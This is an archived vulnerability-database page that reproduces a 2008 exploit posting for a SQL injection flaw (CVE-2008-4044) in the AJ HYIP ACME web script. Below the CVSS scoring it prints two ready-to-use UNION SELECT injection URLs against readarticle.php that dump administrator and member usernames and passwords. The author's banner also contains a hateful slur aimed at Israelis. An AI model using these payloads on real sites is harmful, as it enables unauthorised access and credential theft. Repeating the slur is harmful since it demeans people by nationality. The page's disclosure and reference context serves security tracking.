Bug: AJ HYIP ACME (readarticle.php artid) SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

AJ HYIP ACME (readarticle.php artid) SQL Injection Vulnerability

Published
Credit
Risk
2008.09.14
Cyb3r-1sT
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4044
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by : Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com

<<!>> Groups : InjEctOr5 T3am


=======================================================
+++++++++++++ R3membeR Kings of injection ++++++++++++++
=======================================================


<<->> script : aj-hyip

<<->> script site : www.ajhyip.com/demo/meridian
: www.ajhyip.com/demo/acme
: www.ajhyip.com/demo/prime


=======================================================
++++++++++++++++ pWning israel fuckers ++++++++++++++++
=======================================================


<<->> D0rk : find it

<<->> Exploit :>>>>>>>>>

<!> for admin inf0 :::

>>>>
www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,admin_password),5,6,7
,8+from+admin/*


<!> for members inf0 :::

>>>>
www.site.me/patch/article/readarticle.php?artid=-9999999+union+select+0,1,2,3,concat(username,0x3a,password),5,6,7,8+fro
m+members/*


=======================================================
+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
=======================================================


<<->> freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker
anaconda-ksa $ sirus $ crazy-x $ br1ght-dark $ colden-zero


<<->> InjEctOr5 TeaM freinds :: abo-najm $ Eng.Silent Night $ spid3r-net $ hacker-b0y $ qalbhamad $
Mr.Dangers - RooT-HacKer - 07 - fisher - ToTal



<<->> All muslims

References:

http://xforce.iss.net/xforce/xfdb/44803
http://www.securityfocus.com/bid/30978
http://www.milw0rm.com/exploits/6351

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version